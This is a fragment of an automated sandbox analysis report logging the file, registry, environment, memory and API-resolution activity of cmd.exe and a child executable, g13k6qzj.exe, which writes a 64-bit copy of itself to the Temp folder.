1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
12 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (14)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 |
Process #225: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #225 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:29, Reason: Child Process |
| Unmonitor | End Time: 00:03:35, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa2c |
| Parent PID | 0x380 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4F0
0x
FDC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00280000 | 0x0033dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x00b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x01f7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
